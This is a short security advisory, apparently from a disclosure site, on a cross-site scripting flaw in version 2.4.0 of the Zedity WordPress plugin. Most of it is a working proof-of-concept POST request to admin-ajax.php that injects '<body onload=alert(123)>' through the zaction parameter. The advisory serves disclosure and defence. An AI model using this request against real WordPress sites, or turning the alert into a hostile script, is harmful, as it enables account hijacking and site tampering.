WordPress Zedity 2.4.0 Cross Site Scripting

2014.02.26
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| Zedity XSS # Version .| zedity.2.4.0 # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://wordpress.org/plugins/ # ============================================================== # ============================================================== # XSS ---<request>--- POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1 Host: 10.149.14.62 (...) Cache-Control: no-cache zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data- origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width% 3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+ style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top